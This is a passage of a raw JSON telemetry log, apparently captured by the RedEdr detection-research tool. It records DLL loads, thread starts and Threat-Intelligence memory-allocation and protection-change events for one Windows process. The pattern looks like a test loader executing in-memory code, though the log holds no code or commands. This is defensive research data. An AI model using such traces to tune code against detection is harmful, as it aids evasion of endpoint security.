","id":49,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973843604,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83D40000","ImageBase":"00007FFC83D40000","ImageCheckSum":"681663","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcrt.dll","ImageSize":"000000000009E000","ProcessID":"1208","TimeDateStamp":"2616593924","event":"ImageLoadInfo ","id":50,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973844199,"trace_id":41,"type":"etw"},{"ProcessID":"1208","StackBase":"FFFF8185AAC77000","StackLimit":"FFFF8185AAC71000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DA000","ThreadID":"11092","UserStackBase":"0000009FD8C00000","UserStackLimit":"0000009FD8BFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStartStart ","id":51,"opcode_id":1,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801540391,18446735283801538352,18446735283801537158,18446735283799009541,18446735283798947552,18446735283801492570,18446735283797779076,18446735283796924337,18446735283796923547,18446735283799009541,140722541495044,140722540915673,140722540915302,140722540901535,140722540936098,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973844777,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84650000","ImageBase":"00007FFC84650000","ImageCheckSum":"673563","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\sechost.dll","ImageSize":"000000000009F000","ProcessID":"1208","TimeDateStamp":"1942365337","event":"ImageLoadInfo ","id":52,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973845122,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83410000","ImageBase":"00007FFC83410000","ImageCheckSum":"1244603","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\rpcrt4.dll","ImageSize":"0000000000123000","ProcessID":"1208","TimeDateStamp":"2016036219","event":"ImageLoadInfo ","id":53,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973845622,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C20000","ImageBase":"00007FFC82C20000","ImageCheckSum":"199345","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcrypt.dll","ImageSize":"0000000000027000","ProcessID":"1208","TimeDateStamp":"2535700803","event":"ImageLoadInfo ","id":54,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973846304,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC62B00000","ImageBase":"00007FFC62B00000","ImageCheckSum":"929031","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp140d.dll","ImageSize":"00000000000E2000","ProcessID":"1208","TimeDateStamp":"4270244042","event":"ImageLoadInfo ","id":55,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973850339,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC848D0000","ImageBase":"00007FFC848D0000","ImageCheckSum":"1221752","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ole32.dll","ImageSize":"000000000012B000","ProcessID":"1208","TimeDateStamp":"610785574","event":"ImageLoadInfo ","id":56,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973850943,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C50000","ImageBase":"00007FFC82C50000","ImageCheckSum":"1076532","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbase.dll","ImageSize":"0000000000100000","ProcessID":"1208","TimeDateStamp":"2177850761","event":"ImageLoadInfo ","id":57,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973851508,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84D50000","ImageBase":"00007FFC84D50000","ImageCheckSum":"3511252","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\combase.dll","ImageSize":"0000000000353000","ProcessID":"1208","TimeDateStamp":"3888075817","event":"ImageLoadInfo ","id":58,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973852214,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC833E0000","ImageBase":"00007FFC833E0000","ImageCheckSum":"218727","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3634633287","event":"ImageLoadInfo ","id":59,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973852906,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82FF0000","ImageBase":"00007FFC82FF0000","ImageCheckSum":"137991","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\win32u.dll","ImageSize":"0000000000022000","ProcessID":"1208","TimeDateStamp":"3336608826","event":"ImageLoadInfo ","id":60,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973853419,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82B00000","ImageBase":"00007FFC82B00000","ImageCheckSum":"1180473","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32full.dll","ImageSize":"0000000000117000","ProcessID":"1208","TimeDateStamp":"576863693","event":"ImageLoadInfo ","id":61,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973853787,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83070000","ImageBase":"00007FFC83070000","ImageCheckSum":"659111","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp_win.dll","ImageSize":"000000000009D000","ProcessID":"1208","TimeDateStamp":"958749903","event":"ImageLoadInfo ","id":62,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973854262,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84A00000","ImageBase":"00007FFC84A00000","ImageCheckSum":"1745311","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\user32.dll","ImageSize":"000000000019D000","ProcessID":"1208","TimeDateStamp":"4291603748","event":"ImageLoadInfo ","id":63,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973854932,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC77340000","ImageBase":"00007FFC77340000","ImageCheckSum":"215677","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140d.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3390545094","event":"ImageLoadInfo ","id":64,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973856273,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC7DD50000","ImageBase":"00007FFC7DD50000","ImageCheckSum":"124685","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140_1d.dll","ImageSize":"000000000000F000","ProcessID":"1208","TimeDateStamp":"743278547","event":"ImageLoadInfo ","id":65,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973857377,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC628D0000","ImageBase":"00007FFC628D0000","ImageCheckSum":"2249853","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbased.dll","ImageSize":"0000000000222000","ProcessID":"1208","TimeDateStamp":"3642813796","event":"ImageLoadInfo ","id":66,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973858416,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83DE0000","ImageBase":"00007FFC83DE0000","ImageCheckSum":"244437","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\imm32.dll","ImageSize":"000000000002F000","ProcessID":"1208","TimeDateStamp":"3510600902","event":"ImageLoadInfo ","id":67,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722541282029,140722540968753,140722540934116,140722540931828,140722498119186,140722533672481,140722533664800,140722540943901,140722541286135,140722541285514,140722541285648,140722541285648,140722541285648,140722541706418,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973877940,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC630A0000","ImageBase":"00007FFC630A0000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\RedEdr\\RedEdrDll.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"1734697896","event":"ImageLoadInfo ","id":68,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541236080,140722541232655,140722540968787,140722540934116,140722540931828,140722498119186,140722498150113,140722541498974,140722541497636,140722541322413,140722541321331,140722541321246],"thread_id":6916,"time":133791868973891869,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC73E50000","ImageBase":"00007FFC73E50000","ImageCheckSum":"1883635","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\dbghelp.dll","ImageSize":"00000000001E4000","ProcessID":"1208","TimeDateStamp":"2592498981","event":"ImageLoadInfo ","id":69,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722540968797,140722540934116,140722540931828,140722498119186,140722498150113,140722541498974,140722541497636,140722541322413,140722541321331,140722541321246],"thread_id":6916,"time":133791868973894702,"trace_id":41,"type":"etw"},{"ProcessID":"1208","StackBase":"FFFF8185AAC8C000","StackLimit":"FFFF8185AAC86000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DC000","ThreadID":"3196","UserStackBase":"0000009FD8D00000","UserStackLimit":"0000009FD8CFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStartStart ","id":70,"opcode_id":1,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801540391,18446735283801538352,18446735283801537158,18446735283799009541,18446735283798947552,18446735283801492570,18446735283797779076,18446735283796924337,18446735283796923547,18446735283799009541,140722541495044,140722540915673,140722540970036,140722541246040,140722541156250,140722508034932,140722541153425],"thread_id":11092,"time":133791868973904770,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82F60000","ImageBase":"00007FFC82F60000","ImageCheckSum":"531569","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"3309379821","event":"ImageLoadInfo ","id":71,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140721970357133,140722540924226,140722540923562,140722540921977,140722541282029,140722540968753,140722540932416,140722540930798,140722541041959,140722540905542,140722510982114,140722511029553,140722510934949,140722252973064,140722252970041,140722252944910,140721970336136,140721970334552,140721970362881,140722498356982,140700732029427,140700732031462,140700732110521,140700732110174,140700732109854,140700732110670,140722508034932,140722541153425],"thread_id":6916,"time":133791868979064970,"trace_id":41,"type":"etw"},{"ProcessID":"1208","StackBase":"FFFF8185AC7B9000","StackLimit":"FFFF8185AC7B3000","StartAddr":"0000023F29030000","SubProcessTag":"0","TebBase":"0000009FD88DE000","ThreadID":"5680","UserStackBase":"0000009FD8E00000","UserStackLimit":"0000009FD8DFF000","Win32StartAddr":"0000023F29030000","event":"ThreadStartStart ","id":72,"opcode_id":1,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801540391,18446735283801538352,18446735283801537158,18446735283799009541,140722541489444,140721970350754,140722498157487,140722508052765,140700732029491,140700732031462,140700732110521,140700732110174,140700732109854,140700732110670,140722508034932,140722541153425],"thread_id":6916,"time":133791868979501089,"trace_id":41,"type":"etw"},{"AllocationType":"12288","BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"ALLOCVM_LOCAL","id":73,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909306,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C540","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":74,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909600,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":75,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909618,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C950","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":76,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909633,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":77,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909646,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C590","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":78,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909659,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CA40","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":79,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909673,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C7C0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":80,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909685,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C6D0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":81,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909698,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C7C0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown 